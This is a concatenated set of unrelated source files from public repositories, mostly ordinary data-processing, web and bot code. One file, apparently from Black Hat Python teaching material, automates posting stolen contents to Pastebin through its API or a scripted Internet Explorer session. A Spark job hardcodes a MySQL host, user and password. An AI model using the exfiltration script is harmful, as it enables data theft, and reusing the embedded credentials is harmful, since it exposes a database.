rev.append(r[0].strip())
orig_rev = text_to_word_sequence(" ".join(rev))
if len(orig_rev) < 20:
continue
words = set(orig_rev)
for word in words:
vocab[word] += 1
datum = {"y":div,
"text": orig_rev,
"num_words": len(orig_rev),
"split": np.random.randint(0,cv)}
#if datum['num_words'] > 400:
# continue
revs.append(datum)
# for i in range(1):
# print revs
return revs, vocab
def base_filter():
f = string.punctuation
f = f.replace("'", '')
f += '\t\n'
return f
def text_to_word_sequence(text, filters=base_filter(), lower=True, split=" "):
'''prune: sequence of characters to filter out
'''
if lower:
text = text.lower()
text = text.translate(string.maketrans(filters, split*len(filters)))
seq = text.split(split)
return [_f for _f in seq if _f]
def get_W(word_vecs, k=300):
"""
Get word matrix. W[i] is the vector for word indexed by i
"""
vocab_size = len(word_vecs)
word_idx_map = dict()
W = np.zeros(shape=(vocab_size+1, k), dtype='float32')
W[0] = np.zeros(k, dtype='float32')
i = 1
for word in word_vecs:
W[i] = word_vecs[word]
word_idx_map[word] = i
i += 1
return W, word_idx_map
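
# Example (hypothetical vectors): with word_vecs = {'cat': np.ones(300)}, get_W
# returns (W, idx) such that W[idx['cat']] is the 300-d vector for 'cat', and
# W[0] stays an all-zero padding row.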
def load_bin_vec(fname, vocab):
"""
Loads 300x1 word vecs from Google (Mikolov) word2vec
"""
word_vecs = {}
with open(fname, "rb") as f:
header = f.readline()
vocab_size, layer1_size = map(int, header.split())
binary_len = np.dtype('float32').itemsize * layer1_size
print " Vocab_size:", vocab_size
print " Vocab_dimension:", layer1_size
for line in xrange(vocab_size):
word = []
while True:
ch = f.read(1)
if ch == ' ':
word = ''.join(word)
break
if ch != '\n':
word.append(ch)
if word in vocab:
word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32')
else:
f.read(binary_len)
return word_vecs
def add_unknown_words(word_vecs, vocab, min_df=1, k=300):
"""
For words that occur in at least min_df documents, create a separate word vector.
0.25 is chosen so the unknown vectors have (approximately) same variance as pre-trained ones
"""
for word in vocab:
if word not in word_vecs and vocab[word] >= min_df:
word_vecs[word] = np.random.uniform(-0.25,0.25,k)
if __name__=="__main__":
w2v_file = 'F:/GoogleNews-vectors-negative300.bin'
print "loading data...",
revs, vocab = build_data_cv(cv=10, clean_string=True)
max_l = np.max(pd.DataFrame(revs)["num_words"])
min_l = np.min(pd.DataFrame(revs)["num_words"])
mean_l = np.mean(pd.DataFrame(revs)["num_words"])
'''
for i in range(4):
print revs[i]
exit()
'''
print "data loaded!"
print "number of sentences: " + str(len(revs))
print "vocab size: " + str(len(vocab))
print "max sentence length: " + str(max_l)
print "min sentence length: " + str(min_l)
print "mean sentence length: " + str(mean_l)
print "loading word2vec vectors...",
w2v = load_bin_vec(w2v_file, vocab)
print "word2vec loaded!"
print "num words already in word2vec: " + str(len(w2v))
add_unknown_words(w2v, vocab)
W, word_idx_map = get_W(w2v)
rand_vecs = {}
add_unknown_words(rand_vecs, vocab)
W2, _ = get_W(rand_vecs)
cPickle.dump([revs, W, W2, word_idx_map, vocab, max_l], open("mr.p", "wb"))
print "dataset created!"
| [
"[email protected]"
] | |
b9375991b0bfe68afce4ccdcaef1bfeda77efd0d | 4e7c8a741b50a6c9b3717e7a22daea8a90e42fb3 | /pages/loginPage.py | d56f678fee2c749a6eeff34e6e38262adc5f6826 | [] | no_license | matthiassack/AutomationFramework | 53650bf3ae071f37885b38fe6bd804be9d0e8949 | 32781437447ca9008a4ffd2c49ce1e02478e9290 | refs/heads/master | 2020-04-03T03:22:27.550688 | 2019-07-17T19:12:39 | 2019-07-17T19:12:39 | 154,983,979 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 520 | py | class LoginPage:
def __init__(self, driver):
self.driver = driver
def enter_username(self, username):
self.driver.find_element_by_id("txtUsername").clear()
self.driver.find_element_by_id("txtUsername").send_keys(username)
def enter_password(self, password):
self.driver.find_element_by_id("txtPassword").clear()
self.driver.find_element_by_id("txtPassword").send_keys(password)
def click_login(self):
self.driver.find_element_by_id("btnLogin").click()
| [
"[email protected]"
] | |
97e381ef7d46e7f152a3aa58110194e19506c35d | dd63c94dee080c4628da0acbc8e36642ffc14920 | /scripts/python-scripts/open_budget_other.py | 7183550add42a856dd222a1fc9b22523d78be2dd | [] | no_license | CityOfLosAngeles/laBudget | 120f6d3b22fc6a6f3448fdf7b45894975d93ba67 | 97c0b583c8039d5b72cf8f94f7db4583a93e46b8 | refs/heads/master | 2021-08-05T16:51:29.393342 | 2021-07-29T17:33:50 | 2021-07-29T17:33:50 | 126,221,242 | 1 | 0 | null | 2018-03-21T18:08:40 | 2018-03-21T18:08:39 | null | UTF-8 | Python | false | false | 7,406 | py | #!/usr/bin/env python3
# open_data_ther.py
# Chelsea Ursaner. Edited by Adam Scherling. 6/11/2018
# Converted/Updated July 2021, Irene Tang
####################
## Setup
####################
# make sure to install these packages before running:
# pip install pandas
# pip install sodapy
import datetime
import pandas as pd
import credentials
from sodapy import Socrata
# set up Socrata client
client = Socrata('data.lacity.org', None)
# uncomment if you are going to log in / push to the data portal
# username = credentials.lahub_user
# password = credentials.lahub_pass
# apptoken = credentials.lahub_auth
# client = Socrata('data.lacity.org', apptoken, username=username, password=password)
# csv sheet filenames
csv_filenames = {
'gfrev': '../../data/approved_budget/FY21-22/General_Fund_Revenue_2122_Adopted.csv',
'positions': '../../data/approved_budget/FY21-22/Positions_2122_Adopted.csv',
'inc': '../../data/approved_budget/FY21-22/Budget_Requests_Detail_Sec2_2122_Adopted.csv',
'pm': '../../data/approved_budget/FY21-22/Performance_Measures_2122_Adopted.csv',
}
filepath_prefix = '../../data/approved_budget/FY21-22/'
# # Socrata urls
# urls = {
# 'gfrev' : 'https://data.lacity.org/A-Prosperous-City/General-Fund-Revenue/qrkr-kfbh',
# 'positions' : 'https://data.lacity.org/A-Well-Run-City/Positions/46qe-t7np',
# 'inc' : 'https://data.lacity.org/A-Prosperous-City/General-City-Budget-Incremental-Changes/k4k6-bwwv',
# 'pm' : 'https://data.lacity.org/A-Prosperous-City/Performance-Measures/bywz-284j',
# }
# # Socrata endpoints
# endpoints = {
# 'gfrev' : 'https://data.lacity.org/resource/qrkr-kfbh.json',
# 'positions' : 'https://data.lacity.org/resource/46qe-t7np.json',
# 'inc' : 'https://data.lacity.org/resource/k4k6-bwwv.json',
# 'pm' : 'https://data.lacity.org/resource/bywz-284j.json',
# }
# Socrata identifiers
identifiers = {
'gfrev': 'qrkr-kfbh',
'positions': '46qe-t7np',
'inc': 'k4k6-bwwv',
'pm': 'bywz-284j'
}
timestamp = datetime.datetime.now()
####################
## General fund revenue
####################
# Read the previous dataset from Socrata and save a local copy
gfrev_existing = pd.DataFrame.from_records(client.get(identifiers.get('gfrev'), limit=99999999999999))
gfrev_existing.to_csv(f'{filepath_prefix}old_gfrev_{timestamp}.csv', index=False)
# Read the new file
gfrev_current = pd.read_csv(csv_filenames.get('gfrev'))
# Rename to match original
gfrev_current.rename(columns={
'Dept Code': 'dept_code',
'Dept Name': 'department_name',
'Prog Code': 'program_code',
'Prog Name': 'program_name',
'Fund Code': 'fund_code',
'Fund Name': 'fund_name',
'Account Code': 'account_code',
'Account Name': 'account_name',
'2021-22 Adopted': 'revenue'
}, inplace=True)
# add a fiscal year column
gfrev_current['fiscal_year'] = '2021_22_adopted'
# filter out rows with no revenue
gfrev_current.dropna(how='all', subset=['revenue'], inplace=True)
# select only the relevant columns
gfrev_current = gfrev_current[gfrev_existing.columns]
# Make new dataset
gfrev_new = pd.concat([gfrev_existing, gfrev_current], axis=0)
gfrev_new.to_csv(f'{filepath_prefix}new_gfrev.csv', index=False)
# upload the data to Socrata
# client.replace(identifiers.get('gfrev'), gfrev_new)
###################
# Positions
###################
# Read the previous dataset from Socrata and save a local copy
positions_existing = pd.DataFrame.from_records(client.get(identifiers.get('positions'), limit=99999999999999))
positions_existing.to_csv(f'{filepath_prefix}old_positions_{timestamp}.csv', index=False)
# Read the new file
positions_current = pd.read_csv(csv_filenames.get('positions'))
# Rename to match original
positions_current.rename(columns={
'Dept Code': 'department_code',
'Dept Name': 'department_name',
'Prog Code': 'program_code',
'Prog Name': 'program_name',
'Fund Code': 'fund_code',
'Source Fund Code': 'source_fund_code',
'Source Fund Name': 'source_fund_name',
'Account Code': 'account_code',
'Account Name': 'account_name',
'2021-22 Adopted': 'positions'
}, inplace=True)
# add a budget column
positions_current['budget'] = '2021-2022 Adopted Budget'
# select only the relevant columns
positions_current = positions_current[positions_existing.columns]
# Make new dataset
positions_new = pd.concat([positions_existing, positions_current], axis=0)
positions_new.to_csv(f'{filepath_prefix}new_positions.csv', index=False)
# upload the data to Socrata
# client.replace(identifiers.get('positions'), positions_new)
###################
# Incremental changes
###################
# Read the previous dataset from Socrata and save a local copy
inc_existing = pd.DataFrame.from_records(client.get(identifiers.get('inc'), limit=99999999999999))
inc_existing.to_csv(f'{filepath_prefix}old_incremental_{timestamp}.csv', index=False)
# Read the new file
inc_current = pd.read_csv(csv_filenames.get('inc'))
# Rename to match original
inc_current.rename(columns={
'Department Code': 'department_code',
'Department Name': 'department_name',
'Program Code': 'program_code',
'Program Name': 'program_name',
'Fund Code': 'fund_code',
'Fund Name': 'fund_name',
'Source Fund Code': 'source_fund_code',
'Source Fund Name': 'source_fund_name',
'Budget Request Description': 'budget_request_description',
'Budget Request Category': 'budget_request_category',
'Budget Object Code': 'account_code',
'Audit Budget Object Name': 'account_name',
'One Time/ On-going': 'one_time_ongoing',
'2021-22 (Adopted) Incremental change from 2020-21 Adopted Budget': 'incremental_change'
}, inplace=True)
# add a fiscal year column
inc_current['budget'] = '2021-22 Adopted Budget Incremental Change from 2020-21 Adopted'
# select only the relevant columns
inc_current = inc_current[inc_existing.columns]
# Make new dataset
inc_new = pd.concat([inc_existing, inc_current], axis=0)
inc_new.to_csv(f'{filepath_prefix}new_incremental_changes.csv', index=False)
# upload the data to Socrata
# client.replace(identifiers.get('inc'), inc_new)
####################
## Performance Measures
####################
# Read the previous dataset from Socrata and save a local copy
pm_existing = pd.DataFrame.from_records(client.get(identifiers.get('pm'), limit=99999999999999))
pm_existing.to_csv(f'{filepath_prefix}old_performance_{timestamp}.csv', index=False)
# Read the new file
pm_current = pd.read_csv(csv_filenames.get('pm'))
# Rename to match original
pm_current.rename(columns={
'Dept Code': 'department_code',
'Department Name': 'department_name',
'Org Level 5 Code': 'subdept_code',
'Org Level 5 Name': 'subdept_name',
'Prog Code': 'program_code',
'Program Name': 'program_name',
'PM Code': 'performance_measure_code',
'Performance Measure Name': 'performance_measure_name',
'Unit/Value': 'unit',
'2021-22 Adopted': 'performance_measure_amount'
}, inplace=True)
# add a fiscal year column
pm_current['budget'] = '2021-22 Adopted'
# select only the relevant columns
pm_current = pm_current[pm_existing.columns]
# Make new dataset
pm_new = pd.concat([pm_existing, pm_current], axis=0)
pm_new.to_csv(f'{filepath_prefix}new_performance_measures.csv', index=False)
# upload the data to Socrata
# client.replace(identifiers.get('pm'), pm_new)
| [
"[email protected]"
] | |
1bec78b72f8e244904787164e9f8ab80bebfd067 | cdaedd6c77e1cd04bb15918bbec9895df71d862d | /receive.py | 2d425b44fba5000cdc363d9ff745424fac7c574c | [] | no_license | YPeking/WeChatRobot | 867f164ec60b378bdb9cc1e6bb616298a400fbe1 | ee5d8794f6d71f09baea805f19ef0cf7c39f21ef | refs/heads/master | 2020-04-18T21:43:57.096601 | 2019-01-27T05:30:12 | 2019-01-27T05:30:12 | 167,773,132 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,878 | py | # -*- coding:utf-8 -*-
# filename: receive.py
import xml.etree.ElementTree as ET
import json
import requests
import urllib2
import re
import random
import sys
from bs4 import BeautifulSoup
reload(sys)
sys.setdefaultencoding('utf-8')
def parse_xml(web_data):
if len(web_data) == 0:
return None
xmlData = ET.fromstring(web_data)
msg_type = xmlData.find('MsgType').text
if msg_type == 'text':
return TextMsg(xmlData)
elif msg_type == 'image':
return ImageMsg(xmlData)
elif msg_type == 'voice':
return VoiceMsg(xmlData)
class Msg(object):
def __init__(self, xmlData):
self.ToUserName = xmlData.find('ToUserName').text
self.FromUserName = xmlData.find('FromUserName').text
self.CreateTime = xmlData.find('CreateTime').text
self.MsgType = xmlData.find('MsgType').text
self.MsgId = xmlData.find('MsgId').text
class TextMsg(Msg):
def __init__(self, xmlData):
Msg.__init__(self, xmlData)
content = xmlData.find('Content').text.encode('utf-8')
if((u"段子" in content) or (u"笑话" in content)):
self.Content = get_joke()
elif(u"微博" == content):
self.Content = get_weibo()
elif(u"天气" == content):
self.Content = get_weather()
else:
self.Content = get_tuling_answer(content).encode('utf-8')
class ImageMsg(Msg):
def __init__(self, xmlData):
Msg.__init__(self, xmlData)
self.PicUrl = xmlData.find('PicUrl').text
self.MediaId = xmlData.find('MediaId').text
class VoiceMsg(Msg):
def __init__(self, xmlData):
Msg.__init__(self, xmlData)
self.MediaId = xmlData.find('MediaId').text
self.Recognition = xmlData.find('Recognition').text
if((u"段子" in self.Recognition) or (u"笑话" in self.Recognition)):
self.Content = get_joke()
elif(u"微博" in self.Recognition):
self.Content = get_weibo()
elif(u"天气" == self.Recognition):
self.Content = get_weather()
else:
self.Content = get_tuling_answer(self.Recognition).encode('utf-8')
# Auto-reply through the Tuling robot API
def get_tuling_answer(content):
userId = '123456'
inputText = {'text': content}
    # Replace with your own Tuling API key
key = 'tuling key'
userInfo = {'apiKey':key, 'userId':userId}
perception = {'inputText':inputText}
data = {'perception':perception, 'userInfo':userInfo}
url = 'http://openapi.tuling123.com/openapi/api/v2'
response = requests.post(url=url, data=json.dumps(data))
response.encoding = 'utf-8'
result = response.json()
answer = result['results'][0]['values']['text']
return answer
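
# Usage sketch (the apiKey above is a placeholder; a valid Tuling key is required):
#   get_tuling_answer('hello') -> the robot's text reply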
# Automatically fetch a joke from Qiushibaike
def get_joke():
page_num = random.randint(1, 12)
url = 'http://www.qiushibaike.com/hot/page/' + str(page_num)
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
headers = {'User-Agent':user_agent}
request = urllib2.Request(url, headers=headers)
response = urllib2.urlopen(request)
content = response.read().decode('utf-8')
pattern = re.compile('<div class="author clearfix">.*?<h2>(.*?)</h2>.*?<div.*?span>(.*?)</span>(.*?)<div class="stats">.*?"number">(.*?)</i>' ,re.S)
items = re.findall(pattern,content)
joke_num = random.randint(1, 15)
joke_count = 0
for item in items:
haveImg = re.search("img", item[2])
if not haveImg:
joke_count += 1
if joke_count == joke_num:
strinfo = re.compile("<br/>")
joke = strinfo.sub("", item[1])
spaceinfo = re.compile("\n")
joke_content = spaceinfo.sub("", joke)
return joke_content
# Fetch Weibo trending searches
def get_weibo():
url = 'http://s.weibo.com/top/summary?cate=realtimehot'
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
headers = {'User-Agent':user_agent}
request = urllib2.Request(url, headers=headers)
response = urllib2.urlopen(request)
content = response.read().decode('utf-8')
bsObj=BeautifulSoup(content)
i = 0
weibo_content = ""
    # Extract each trending topic's name and link
for tag in bsObj.find_all("a", {"target":"_blank"}):
weibo = re.findall(r"<a href=\"(.*?)\" target=\"_blank\">(.*?)</a>" ,str(tag))
(weibo_url, weibo_title) = weibo[0]
if("<img alt=" in weibo_title):
nPos = weibo_title.index(" <img alt=")
weibo_title = weibo_title[0:nPos]
weibo_url = "https://s.weibo.com" + weibo_url
weibo_link = "<a href=\"%s\">%s</a>" % (weibo_url, weibo_title)
weibo_content = weibo_content + weibo_link + "\n\n"
i += 1
if i==6:
break
return weibo_content
# Fetch the Beijing weather forecast
def get_weather():
# 天气链接
weatherJsonUrl = "http://wthrcdn.etouch.cn/weather_mini?city=北京"
response = requests.get(weatherJsonUrl)
weather_content = ""
    # Parse the JSON response into a Python dict
weatherData = json.loads(response.text)
    # Today's high/low temperature and wind info
total_info = weatherData['data']['forecast'][0]['type']
high_temperature = weatherData['data']['forecast'][0]['high'][3:]
low_temperature = weatherData['data']['forecast'][0]['low'][3:]
fengli = weatherData['data']['forecast'][0]['fengli'][9:]
wind_info = weatherData['data']['forecast'][0]['fengxiang'] + " " + fengli[:-3]
today_info = "今天 " + total_info + " " + high_temperature + "~" + low_temperature + "\n " + wind_info
    # Tomorrow's high/low temperature and wind info
total_info = weatherData['data']['forecast'][1]['type']
high_temperature = weatherData['data']['forecast'][1]['high'][3:]
low_temperature = weatherData['data']['forecast'][1]['low'][3:]
fengli = weatherData['data']['forecast'][1]['fengli'][9:]
wind_info = weatherData['data']['forecast'][1]['fengxiang'] + " " + fengli[:-3]
tomorrow_info = "明天 " + total_info + " " + high_temperature + "~" + low_temperature + "\n " + wind_info
    # Day-after-tomorrow's high/low temperature and wind info
total_info = weatherData['data']['forecast'][2]['type']
high_temperature = weatherData['data']['forecast'][2]['high'][3:]
low_temperature = weatherData['data']['forecast'][2]['low'][3:]
fengli = weatherData['data']['forecast'][2]['fengli'][9:]
wind_info = weatherData['data']['forecast'][2]['fengxiang'] + " " + fengli[:-3]
last_info = "后天 " + total_info + " " + high_temperature + "~" + low_temperature + "\n " + wind_info
    # Health advice (the API's 'ganmao' cold-risk tip)
suggest = " " + weatherData['data']['ganmao']
weather_content = today_info + "\n" + tomorrow_info + "\n" + last_info + "\n\n" + suggest
return weather_content
| [
"[email protected]"
] | |
bfd099d66ee9d7b87dd9a8eb08c4997bc219aa25 | 834c39ad6ee2bb11f76eff7a0beb00dd7ccad92c | /Blood_project/Blood_project/urls.py | c9c22e1f99986e18d5185c8a8c274d9a566a531e | [] | no_license | krishnarc/uyirottam | 7287cf506cf447341e051083e917ee6113ffb13d | a366cba8be3610fe92be2be10ef6db681a1231b2 | refs/heads/master | 2021-04-03T06:50:09.670508 | 2018-03-11T13:54:56 | 2018-03-11T13:54:56 | 124,734,764 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 916 | py | """Blood_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import url,include
from django.urls import path
from Blood_app import views
urlpatterns = [
url(r'^$',views.index,name="index"),
url(r'^Blood_app/',include("Blood_app.urls")),
path('admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
d4f9b4e366d56eaaeff7f64d62067dd824b12004 | b8680901550000885423448cc4ca2564671a82b6 | /tienda/store/views.py | 4c38a47dc5403d70509941a5a7f25e454d1aff15 | [] | no_license | EdgarRuizUribe/storeDjango | c401bdb1f8e700d1ba9119ac52d02fd622f27146 | 322defc45241cd163cede14d0618a3ca25cf47a7 | refs/heads/master | 2020-03-31T10:03:53.949226 | 2019-03-14T16:27:50 | 2019-03-14T16:27:50 | 152,121,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | from django.shortcuts import render, get_object_or_404
from .models import *
from django.shortcuts import redirect
# Create your views here.
def store_home(request):
productos = Producto.objects.all()
return render(request, 'store/store_productos.html',{'productos':productos})
def producto_detalle(request, pk):
# if request.method == 'POST':
# else:
producto = get_object_or_404(Producto, pk=pk)
return render(request, 'store/producto_detalle.html',{'producto':producto}) | [
"[email protected]"
] | |
7c00814fdab5464425f65d37ee9b12c6dd61a2b9 | d29e8586ae5da87b03e1636cc50f85e6dcf866b3 | /writeToMysqlTop500_3.py | 31f64ef400487d8220f41420749de6402b7728be | [] | no_license | kummar/Spark2Mysql | 453e34a8c9f3933ad8e446accc7b93e7331796f3 | ec8cd4a4a2f89865b42a13947b2f17e225ef98e0 | refs/heads/master | 2020-03-17T18:35:26.493596 | 2018-05-17T14:52:35 | 2018-05-17T14:52:35 | 133,827,436 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,291 | py | # -*- coding: utf-8 -*-
#sys.setdefaultencoding('utf-8')
from pyspark.sql import SparkSession,functions
import datetime
from pyspark.sql import Row
#get yesterday
class DataUtil(object):
    def getYesterday(self):  # get yesterday's date
        yesterday = datetime.datetime.today() - datetime.timedelta(days=1)  # subtract one day
return yesterday.strftime('%Y%m%d')
# create the Spark session
warehouse_location = "/user/hive/warehouse"
spark = SparkSession\
.builder\
.appName("yiju")\
.config("spark.sql.warehouse.dir",warehouse_location)\
.enableHiveSupport()\
.getOrCreate()
sc = spark.sparkContext
yesterday=DataUtil().getYesterday()
df=spark.sql("select f.shop_id,f.data,f.count,f.type from ( select shop_id,e.data,e.count,e.type, row_number() over (partition BY e.shop_id,e.type ORDER BY e.count DESC) AS rownum from dmp.eju_result_all e )F where f.rownum<=500").repartition(200)
df.withColumn('date',functions.lit(yesterday))\
.write.mode("append").format("jdbc").option("url", "jdbc:mysql://172.16.103.174:3306/yj_dsp")\
.option("driver","com.mysql.jdbc.Driver").option("dbtable", "t_ehouse_report2")\
.option("user", "dspapp").option("password", "Ds.16Adm").option("useSSL", "false").save()
| [
"[email protected]"
] | |
28dfc33f12c30cd2809e6e0f6ed5e7f7d1e972f3 | 3ba0dc2a1c4a32881e10f1a750ef96d0772049fb | /12-8.py | 8a5694745732ec9f4e609c2daeaaa467616e715d | [] | no_license | yellow77/pythonad | de5a07d58e3ec199011fb2de4e032d7b9bb33d5a | 14e03a3c3e1562b08f6cda033b667b1a02e02a08 | refs/heads/master | 2020-07-18T22:03:08.655564 | 2019-09-05T04:53:07 | 2019-09-05T04:53:07 | 206,321,031 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 521 | py | # _*_ coding: utf-8 _*_
# Program 12-8 (Python 3 Version)
import os, hashlib, glob
allfiles = glob.glob('*.jpg') + glob.glob('*.png')
allmd5s = dict()
for imagefile in allfiles:
print(imagefile + " is processing...")
img_md5 = hashlib.md5(open(imagefile,'rb').read()).digest()
if img_md5 in allmd5s:
print("---------------")
print("以下為重覆的檔案:")
os.system("open " + os.path.abspath(imagefile))
os.system("open " + allmd5s[img_md5])
else:
allmd5s[img_md5] = os.path.abspath(imagefile)
| [
"[email protected]"
] | |
df89b2ad0a03436054a0cd230c4e9e9f85600525 | df560dde5ffbae51187041f422c87f7d1544cbe9 | /leetcode/python/73_set_matrix_zeroes.py | 2de9b6873ddcd703af3c4af78da47cf6055c48a0 | [
"MIT"
] | permissive | VVKot/coding-competitions | 61c97dbc4fdaeb0a35ff7fa8e55529b579fd1ebb | 7d6e599b223d89a7861929190be715d3b3604fa4 | refs/heads/master | 2021-07-04T17:47:34.246535 | 2020-09-23T20:28:30 | 2020-09-23T20:28:30 | 174,696,391 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 688 | py | from typing import List
class Solution:
def setZeroes(self, matrix: List[List[int]]) -> None:
H = len(matrix)
W = len(matrix[0])
col1 = 1
for y in range(H):
for x in range(W):
if not matrix[y][x]:
if x == 0:
col1 = 0
else:
matrix[0][x] = matrix[y][0] = 0
for y in reversed(range(H)):
for x in reversed(range(W)):
if x == 0:
if col1 == 0:
matrix[y][x] = 0
elif matrix[0][x] == 0 or matrix[y][0] == 0:
matrix[y][x] = 0
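

# Quick sanity check on the example from the problem statement
# (hypothetical driver, not part of a LeetCode submission):
if __name__ == '__main__':
    m = [[1, 1, 1], [1, 0, 1], [1, 1, 1]]
    Solution().setZeroes(m)
    assert m == [[1, 0, 1], [0, 0, 0], [1, 0, 1]]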
| [
"[email protected]"
] | |
bbf1579edad71cb815dff1b82b3f7a251ea0d70b | d4f264368005a8b1e9411e606ab0465492e21caf | /conftest.py | 04fc7fd61459888cb1b2a6732c6ac87bcf416b5c | [
"BSD-2-Clause"
] | permissive | harvimt/tes4py | d2c4445bf40fec02e5bc730a87c14394f71d2918 | a6f3abc046f9ef6f5185b13a844e7c00ce13f21d | refs/heads/master | 2020-05-04T13:57:13.766608 | 2019-04-03T00:37:32 | 2019-04-03T00:37:32 | 179,179,933 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py | import sys
import os.path
sys.path.append(os.path.dirname(__file__)) | [
"[email protected]"
] | |
fb8e2f2f36b3d5a401c0be898b46659cae39cf29 | 1c3f695d939dfd8bb5f3671648c7f538c6f4d01f | /Chapter09/paste_exfil.py | 7d3eb2ad73675946a252b4235a6921c04360f09b | [
"MIT"
] | permissive | Mazuco/Black-Hat-Python | 83be969770768f61daadd068287d1fe3bec0defd | 0f7432d523d88ddb4295d9e558ead679961ecbb2 | refs/heads/main | 2023-04-02T14:06:21.899542 | 2021-03-18T18:44:51 | 2021-03-18T18:44:51 | 349,146,558 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,204 | py | from win32com import client
import os
import random
import requests
import time
username = 'tim'
password = 'seKret'
api_dev_key = 'cd3xxx001xxxx02'
def plain_paste(title, contents):
login_url = 'https://pastebin.com/api/api_login.php'
login_data = {
'api_dev_key': api_dev_key,
'api_user_name': username,
'api_user_password': password,
}
r = requests.post(login_url, data=login_data)
api_user_key = r.text
paste_url = 'https://pastebin.com/api/api_post.php'
paste_data = {
'api_paste_name': title,
'api_paste_code': contents.decode(),
'api_dev_key': api_dev_key,
'api_user_key': api_user_key,
'api_option': 'paste',
'api_paste_private': 0,
}
r = requests.post(paste_url, data=paste_data)
print(r.status_code)
print(r.text)
def wait_for_browser(browser):
while browser.ReadyState != 4 and browser.ReadyState != 'complete':
time.sleep(0.1)
def random_sleep():
time.sleep(random.randint(5,10))
def login(ie):
full_doc = ie.Document.all
for elem in full_doc:
if elem.id == 'loginform-username':
elem.setAttribute('value', username)
elif elem.id == 'loginform-password':
elem.setAttribute('value', password)
random_sleep()
if ie.Document.forms[0].id == 'w0':
ie.document.forms[0].submit()
wait_for_browser(ie)
def submit(ie, title, contents):
full_doc = ie.Document.all
for elem in full_doc:
if elem.id == 'postform-name':
elem.setAttribute('value', title)
elif elem.id == 'postform-text':
elem.setAttribute('value', contents)
if ie.Document.forms[0].id == 'w0':
ie.document.forms[0].submit()
random_sleep()
wait_for_browser(ie)
def ie_paste(title, contents):
ie = client.Dispatch('InternetExplorer.Application')
ie.Visible = 1
ie.Navigate('https://pastebin.com/login')
wait_for_browser(ie)
login(ie)
ie.Navigate('https://pastebin.com/')
wait_for_browser(ie)
submit(ie, title, contents.decode())
ie.Quit()
if __name__ == '__main__':
    ie_paste('title', b'contents')
| [
"[email protected]"
] | |
efd1d2ca53daa70e280868bb3653d80b87a6acf9 | 32079a99520872be97e83ccbd3ae6f003f925006 | /devel/lib/python2.7/dist-packages/um7/srv/_Reset.py | fc277551aa00b30da6af51f1fe9b0b4d4e764e76 | [] | no_license | wndxwilson/Azimorph | a00fa8d34e664cc29cd9226ec378f93fa7df088e | 60b81694cadaaf30b9f640a4ed3bebd20ebc2f1a | refs/heads/master | 2023-02-16T12:55:26.046759 | 2021-01-08T22:09:30 | 2021-01-08T22:09:30 | 328,021,807 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,602 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from um7/ResetRequest.msg. Do not edit."""
import codecs
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class ResetRequest(genpy.Message):
_md5sum = "626ea3efbc6874926126840202a803dd"
_type = "um7/ResetRequest"
_has_header = False # flag to mark the presence of a Header object
_full_text = """bool zero_gyros
bool reset_ekf
bool set_mag_ref
"""
__slots__ = ['zero_gyros','reset_ekf','set_mag_ref']
_slot_types = ['bool','bool','bool']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
zero_gyros,reset_ekf,set_mag_ref
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(ResetRequest, self).__init__(*args, **kwds)
# message fields cannot be None, assign default values for those that are
if self.zero_gyros is None:
self.zero_gyros = False
if self.reset_ekf is None:
self.reset_ekf = False
if self.set_mag_ref is None:
self.set_mag_ref = False
else:
self.zero_gyros = False
self.reset_ekf = False
self.set_mag_ref = False
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_3B().pack(_x.zero_gyros, _x.reset_ekf, _x.set_mag_ref))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
_x = self
start = end
end += 3
(_x.zero_gyros, _x.reset_ekf, _x.set_mag_ref,) = _get_struct_3B().unpack(str[start:end])
self.zero_gyros = bool(self.zero_gyros)
self.reset_ekf = bool(self.reset_ekf)
self.set_mag_ref = bool(self.set_mag_ref)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_3B().pack(_x.zero_gyros, _x.reset_ekf, _x.set_mag_ref))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
